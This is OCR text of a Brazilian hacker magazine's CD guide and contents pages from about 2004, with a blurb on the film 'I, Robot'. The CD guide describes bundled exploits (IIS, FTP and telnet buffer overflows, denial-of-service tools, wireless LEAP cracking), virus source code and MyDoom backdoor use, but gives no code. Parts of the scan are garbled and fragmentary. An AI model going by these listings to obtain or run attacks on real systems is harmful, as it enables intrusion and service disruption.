Crimes PoBÓBICOS EM 2035 


Clássico da literatura de ficção científica vai para as telas 


Will Smith investiga um assassinato 
supostamente cometido por um robô 
em uma Chicago futurista onde os 
andróides já fazem parte da realidade 
humana. Ele é o policial Del Spooner e a 
grande novidade é a atuação de NS-5 
da Android Mechanics, o robô. 


A descrição acima faz parte do filme 
“|, Robot” (em português: Eu, Robô), 
baseado no livro homônimo de Isaac 
Asimov, cujo diretor é Alex Proyas, o 
mesmo de Corvo: Cidade das Sombras. 


Quando um cientista da US Robotics 
se suicida, Del Spooner desconfia que o 
autor do crime na verdade seja um 
robô. A suposição, no entanto, 
contraria as leis da robótica que 


partem de três princípios básicos: os 
robôs não podem fazer mal a um 
humano, devem sempre obedecer a 
um humano (exceto quando em 
conflito com a primeira lei) e devem 
proteger a si mesmos (exceto quando 
em conflito com a primeira ou 
segunda leis). 


WHAT WILL YOU DO WITH 


O drama principal do filme é pensar 
que, se os robôs não respeitam tais leis, 
o que os impede de dominar o mundo? 


O filme tem previsão de lançamento 
nos Estados Unidos no dia 2 de junho. 


Confira o site do andróide e do filme: 


http:/Aynww.irobotnow.com 
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GUIA DO CD 


Hacker 15 


do CD 


ae 
E 
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Qualquer micro com 32 MB de RAM e um 
Pentium pode rodar o CD da Hacker. Muitos 
programas, porém, exigirão muito mais da sua 
máquina, ao serem instalados. O CD deverá 
roda automaticamente ao ser colocado no 
drive. Se tiver problemas, é só entrar no 
Gerenciador de Arquivos, no qual você também 
poderá acessar cada programa individualmen- 
te, sem usar a interface. 


Destaques 


Se você não conseguir instalar algum 
software do CD ou se tiver alguma dúvida, 
entre em contato com nosso serviço de 
atendimento ao leitor, de segunda a sexta, 
em horário comercial. 


Por e-mail: atendimentoBd'igerati com.br 
Portelefone: (11)3217-2626 


Neste:CD, você tem acesso a imporantes informações. Exploits e Vírus: estude os códigos-fonte de 


vírus que atormentaram usuários de Windows nos últimos meses e confira também como eles 
atacavam defeitos do Windows para se estabelecer. Uma coisa está ligada a outra. Entenda 


porque conhecimento é poder. 


E, sendo assim, aprenda também como se proteger desses ataques. Nesta edição, confira duas 
novas distros do sistema operacional livre voltadas para segurança: o INSERT-1.2,4e 0 L.A.S. Linux. 


>> Categoria: 


Linux Security 


EnGarde Community Edition 

Distribuição Linux desenvolvida para atender 
as necessidades de quem quer avaliar o nível 
de segurança, com características como 
administração segura remota, detecção de 
intrusos no host ou na rede, e-mail e FTP 
seguros, firewall, monitor do sistema de 
acesso, centro de controle de segurança, 
entre outras. Suporte gratuito por 30 
dias.(Obs.: para obter o suporte, é preciso se 
cadastrar no site http:// 

www. guardiandigital.com). 


INSERT-1.2.4 

Sistema baseado no Knoppix, com muitas idéias 
extraídas da distribuição Damn Small Linux 
Recupera desastres e analisa sistemas de rede. 


L.A.S Linux 

Sistema lançado pelo Local Area Security Linux. 
Um live CD que contém cerca de 200 informa- 
ções de segurança e ferramentas. 


Accipiter 
O Accipiter Direct S. 
do tipo traversal directory, que permitem obter 


ilidades no Brok 
Server versão 6 causam u 


server ao utilizar 100% dos ciclos da € 


Cesarftp 
A versão 0.99e do Ces 


evar o sistema a consumir 1009 


TP tem um bu 


entre elas, a do 
UDP 69, pode ser ativado pi 
o comando quanto o PUT se 


executa m nenhum tipo 


Cross Domain Leakage 


ermite frameset: domínios 


event 


Nova ferramenta para análise de configu- 
ração de aplicações Web rodando ASP.Net. 
Consegue detectar muitos erros comuns de 
configuração usando apenas alguns 
requests HTTP. 

Geohtt 

O GeoHttpServer é vulnerável a ataques de 
authentication bypass e denial of service. 


Exploit para Windows FTP server versão 1.6. 


Nova versão do THC-Hydra, do grupo The 
Hacker's Choice. 


Exploit de privillege-escalation para IIS 5.0. 


Exploit de remote buffer overflow para o 
Jordan Windows Telnet Server v1.2. 
Testado em Win32 e Unix. 


Explora a vulnerabilidade do IE que permite 
inserir uma URL javascript no histórico do 
navegador, causando assim um cross site/ 
zone ataque quando o usuário pressiona a 
tecla “Backspace”. 


Exploit remoto para o serviço LDAP do iMail 8.05. 


Programa escrito para testar se um sistema 
Linux x86 está exposto à vulnerabilidade no 
do mremap(). 


! 


Destrua o serviço SMTP do Windows 2000. 


Scanner nfs extremamente rápido. 


Versões 5.1 e 6.0 são vulneráveis a vários 
ataques de cross site scripting, path 
disclosure e listagem de diretório. 


Bug no hjttpd do PalmOS causa um crash 
“Fatal Error”. 


FTP de conexão passiva hijacker. 


O phpMyAdmin 2.5.5-pl1 e anteriores não 
transformam variáveis apropriadamente, 
resultando na abertura da aplicação a um 
ataque directory traversal. 


Exploit remoto que usa um buffer overflow 
durante requests GET no PSOProxy server 
versão 0.91. 


Exploit local para a expect library do 
RedHat Linux. 


O Sambascan2 permite procurar em uma 
rede inteira ou um número de hosts por 
SMB shares e lista os conteúdos de todos os 
shares públicos encontrados. 


A versão 1.13 do Sami FTP server tem 
múltiplas vulnerabilidades que podem levar 
a um ataque denial of service. 


A versão 2.3 do ShopCartCG| contém 
múltiplas vulnerabilidades de directory 
traversal, que permite a ataques 
remotos ganharem acesso a arquivos 
fora do webroot. 

O smbmount pode causar um denial of 
service no Windows. O ataque leva o 
sistema a uma falta de memória criando 
diretórios de uma maneira es 


Restabelece uma query SQL através de 
componentes IIS's RDS. 


Esta versão cai quando um directory 
traversal ocorre. 


Cliente para linha de comando Unix 
para MS-SQL. 


O Symantec FireWallN/PN Appliance 
modelo 200 mostra a senha de administra- 
dor em texto claro por um conexão HTTP 
não-encriptada. 


Ferramentas para quebrar a ténica 
NTChallengeResponse de encriptação, 
usada pelo sistema Cisco Wireless LEAP de 
autenticação. Também contém ferramen- 
tas de spoofing challenge-packets para AP 
(acess point), permitindo assim um ataque 
direto a cada usuário de uma rede wireless. 


Exploit unicode para IIS 4/5 com SSL e 
Proxy ativados. 


Exploit para webdav/ntdll.dlloverflow no IIS. 


O WebCortex Webstores2000 versão 6.0 
contém uma vulnerabilidade de SQL 
Injection que permite ao atacante remoto 
adicionar uma conta administrativa, além 
de uma falha de cross site scripting. 


Exploit que comete um denial of service no 
recurso Samba File Sharing do Windows 
XP/2003. 


Exploit que testa várias vulnerabilidades em 
uma das funções APl do kernel nativo do 
Windows XP. 


Exploit remoto que utiliza um buffer 
overrun no Serv-U FTP server tanto nas 
versões 4.2, como nas anteriores. 


>> Categoria: 


Vírus 


Xp Blaster Pro 
ar 0 Windows 
os nicializ 


iminutos 


W32.RedDwarf.Worm-B 
Decompilation 
mHTML e 


How to upload/execute code 
via MyDoom's backdoor 


Better asm source for 
Mydoom.A (Unpacked from 
UPX) 


Categoria: Programação 


Perl-5.8.3 


Uma das mais poderosas linguagens de 


programação, a “Practical Extraction And 


Report Language” (Perl), criada por Larry 
Wall. Seja um monge você também. 


QT3.3.1 

Desenvolva aplicações gráficas utilizando todo 
o poder da biblioteca usada pelo projeto KDE 
para a criação de sua famosa interface 
gráfica de sistemas operacionais livres, o KDE. 


QT Embedded-3.3.1 


A versão “small” da QT para programação de 
interfaces gráficas para sistemas embedded. 


Gcc-3.3.3 

Sem dúvida, o compilador mais 
famoso. Faz de tudo, desde seus 
códigos em C até um ovo frito, se 
você quiser. 


LCCWin32 

Compilador da linguagem de progra- 
mação C, que deu origem a vários 
sistemas operacionais. 


Código do Editor 

Utilize o código do editor para acompa- 
nhar seus estudos do tutorial de QT da 
categoria Docs. 


>> Categoria: Patches 


Microsoft Windows Server 2003: 
KB830352 

Correção para o Windows 2003 Server, 
onde foi encontrada uma falha de seguran- 
ça que permitia que um invasor comprome- 
tesse um computador executando o Serviço 
de cadastramento na Internet do Microsoft 
Windows (WINS), obtendo controle sobre o 
mesmo. Requer Windows 2003. 


Internet Explorer 6 Service Pack 1 
(KB831167) 

Correção para o problema “HTTP 500 - erro de 
servidor interno”, mensagem que começou a ser 
exibida durante a tentativa de visitar sites seguros 


Patch do Windows XP 

Capacidade AMD agora disponível no XP 
melhore o desempenho de seu notebook, 
ajustando dinamicamente a voltagem e 
frequência operacional de acordo com a 
tarefa. Tecnologia PowerNow! para os 
processadores móveis AMD Athlon 4. 


Windows Server 2003 64-bit Edition 
and Windows XP 64-bit Edition 
Version 2003: KB828028 

Versão em inglês da correção da falha 
encontrada nessas versões do Windows, 
que permitia a um invasor comprometer 
seu sistema. 


Outlook Express 6 Service Pack 1 
Correção do erro de exibição de informa- 
ções em línguas diferentes que ocorria 
durante a consulta a “Dicas do Dia”. 


Openyall Linux kernel patch 

Mais segurança para o kernel do Linux. 
Com vários reparos de segurança que 
mantêm a privacidade, impedindo que os 
usuários possam ver o que outros 

estão fazendo. 


DSA-450-1 linux-kernel-2.4.19-mips 
Falhas encontradas na raiz do sistema são 
corrigidas com esse patch. 


Debian - DSA-449-1 metamail 
Correções de erros no metamail, que 
permitia que invasores utilizassem seu 
cliente de e-mail. 


Debian -kernel-source-2.2.22, 
kernel-image-2.2.22-alpha 

Correção para a falha de segurança no 
código de gerenciamento de memória do 
Linux dentro do mremapt(2). da chamada 
do sistema. 


Slackware — Mutt 
Reparo para Mutt no Slackware que poderia 
ocasionar problemas no computador. 


>> Categoria: Do 


POD - documentation in PDF 
Coleção emi de document: 


Documentation in 


EmbPerl 
Tutorial em inglês que ensina a utilizar Pe 
documentos HTML. 


Introdução ao Perl 
escrito por Carlos Duarte, introduzindo a lingu: 


Programação QT 

Tutorial divi m cinco partes, direcionado tanto a programado- 
es como iniciantes, escrito por Ricardo Vaz Mannrich 

para o site comlinux.com.br. O »cê encontrará 

ão” dentro do rio chamado “ 

2 um código-fonte que 


e 5 do tutorial 


Categoria: Kit de Acesso 


aShampoo 


Acelerador de conexão à Internet Freeware 


Download Accelerator v5.3 
Gerenciador e acelerador de downloads 


Discador Digerati (Win32) 
Discador para conexão totalmente grátis no provedor Digerati.com 


Discador Digerati (Linux) 
Discador para conexão totalmente grátis no provedor Digerati.com 


ePrompter 
Utilitário que checa e visualiza contas POP diretamente do servidor. 


ICQ Lite 
Versão simplificada e em português do instant messenger mais 
famoso do mundo. 


OAdPopUp 


Bloqueador que impede a abertura de janelas pop-up no navegador. 


Ultrafunk PopCorn 
Cliente de e-mail simples e superleve. 


>> Categoria: Essenciais 


Acrobat Reader 6.0.1 
Visualize, navegue e imprima Adobe PDFs no seu browser. 


Acrobat Reader 5.08 (Linux) 
Visualize, navegue e imprima Adobe PDFs no Linux com o 
Acrobat Reader. 


Java 2 Runtime Environment SE 1.4.2 

Parte integrante do Java 2 SDK, mas sem as ferramentas de 
desenvolvimento, como compiladores e debugadores. Consiste 
em uma máquina virtual Java, com as classes mais utilizadas 
na plataforma. 


Flash Player v7.0 (Netscape,Opera) 
Última versão do plug-in para Netscape do principal formato de 
animação para Web. 


Flash Player v7.0 (TE) 
Última versão do plug-in para Internet Explorer do principal 
formato de animação para Web. 


DivX 5.1 
Programa para assistir a vídeos no padrão DivX, um formato de 
compressão de vídeo. 


Filzip v3.0 

Utilitário para compressão que trabalha com 15 formatos diferen- 
tes como AR], CAB, RAR, TAR e LHA. O programa se integra ao 
Windows, suporta drag-and-drop, compressão e extração de 
arquivos direto do menu de contexto do Explorer. 


Explorer 2£s 
Visualize e acesse o conteúdo da sua partição Linux no Windows 
com uma interface parecida com a do Windows Explorer. 


Microsoft Windows Installer v2.0 
Patch da Microsoft necessário para a instalação de pacotes de 
programas com a extensão MS! 


Uninstall Manager v4.10 

Programa para a desinstalação de arquivos que faz leitura de 
tudo o que será desinstalado e apaga completamente qualquer 
sobra de arquivo. 


WinRAR v3.20 

Compactador para Windows que possui suporte aos formatos 
RAR, ZIP, CAB, ARJ, LZH, versões GUI e opção de recuperação de 
dados. Oferece melhor encriptação, comentários ANSI, Self- 
Extractor, DOS e 05/2 
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José sonha 
em conhecer 


Juntos podemos realizar este sonho 


Como José, milhares de pessoas no Brasil ainda não tiveram 

a oportunidade de conhecer o mundo digital. A Digerati conta com 
a sua ajuda para realizar este sonho. Se você tiver um computador 
ou equipamentos que não usa mais, entre em contato conosco. 
Buscamos tudo em sua casa, encaminhamos para uma entidade 
em sua cidade e financiamos o material didático para ela. 

Inclusão digital: nós podemos realizar este sonho. 

Mais informações pelo telefone (II) 3217-2605 


pode ficar mais bonito 


São muitas as opções para desenvolvimento 
no Linux. A TrollTech lançou o toolkit QT, 
uma alternativa ao Kylix da Borland robusta 
e simples de ser implementada em outras 
plataformas. A QT tem interfaces de 
programação C++, Python e Ruby, entre 

| outras. Também vem com um programa 

| muito interessante, o QTDesigner, que 

| permite ao usuário “desenhar” suas telas, 
| fazer previews e inserir códigos. 


Exploits em Perl: 
use uma linguagem 
poderosa para 

seus projetos 


O Perl é hoje uma das linguagens de 
programação mais poderosas que existe. 
Fácil de aprender e cheia de possibilidades, 


a linguagem criada por Larry Wall pode 

servir também para criar exploits de dar 
inveja. Confira ainda o Perl 5.8 completo 
no CD. Seja um monge você também. 


Firewall transparente: 
faça você mesmo 


O firewall tem como principal função o 
bloqueio de pacotes ou filtro de aplicações. 
Que tal pensar em um firewall transparente, 


que exibe facilmente dados de sua configura- 
ção? Deste modo, ataques podem ser inibidos 
ou hackers podem ter a atenção desviada de 


outro servidor mais poderoso. 


Configura: 


Tutorial de €: 
Ponteiros 


Neste tutorial, explore operações com ponteiros. 
Entender o assunto é essencial para compreen- 
der outros pontos importantes, como o trata- 
mento de memória. Entre os tópicos discutidos 
estão a comparação de ponteiros, ponteiros e 
matrizes e indireção. 


Assim caminham 
as pragas 


O que acontecerá com vírus e 
trojans no futuro 


Se você ainda duvida que pode ser vítima de 
uma praga virtual, tome cuidado! Você 
poderá ser mais uma vítima dos vírus e 
trojans que dão a volta ao mundo em 
segundos e batem no seu PC. Examine quais 
os riscos em continuar usando sistemas alvo 
como o Windows. Conheça a importância 
dos vírus que se disseminam por bugs e faça 
suas apostas no futuro. 


para eleitos 


Carta aberta de Stallman comemora 20 
anos de Software Livre. Hackers ameaçam 
agenciadores de apostas da Web. Segre- 
dos hilários no código-fonte do Windows. V 
Fórum Internacional de Software Livre 
prepara as máquinas. Criptografia para 
streaming na linha de produção. Ataques 
mancham reputação do Debian. Hacker 
invade ViewSonic e é condenado a um ano 


por pr 


mínima do equipament 


News: pequenas doses de informação 


C ocessador Pentium Il ou superior com 84 MB de 
RAM; placa de vídeo com 16 MB, resolução de 800xB0D0 pixels e 16 milhões de cores; 
! placa de som. 


+15 


Subculture: 
cultura hacker 


—. UU das CAES 


Livro 


Apocalipse Motorizado — Entenda a relação 4 
de amor e ódio que temos com automóveis e : 
decida: quer destruir o seu carro? 


Cinema 


Hellboy ? Do inferno para a tela dos cinemas, 

urna das melhores adaptações dos quadrinhos de 
todos os tempos q 
Eu, Robô ? Andróide suspeito pode ser 

assassino fora-da-lei. Ex-rapper delegado de 

polícia é o investigador em adaptação de livro de — 
Isaac Asimov 


Música 


Incubus = Em 4 Crow Left Of The Murder, 
velha fórmula continua fazendo sucesso 
Neurotron — Conheça o duo alemão que traz o 
mais puro e delicioso deep house nos EPs 
Purushae Too Close to Dawn 


de prisão. Mozilla Firebird transforma-se em 
Firefox. Erros no Internet Explorer dão show. 

de vulnerabilidades. MP3 passará a utilizar a 
tecnologia DRM. Volta do Napster decepciona. 
Criadores de vírus trocam “elogios” em meio a » 
códigos. ADSL 2+ é novo acesso banda larga. 
Orkut é ferramenta para unir comunidades 
virtuais. SCO contra-ataca. Empregada-robô 
lava, passa e cozinha e muito mais. 


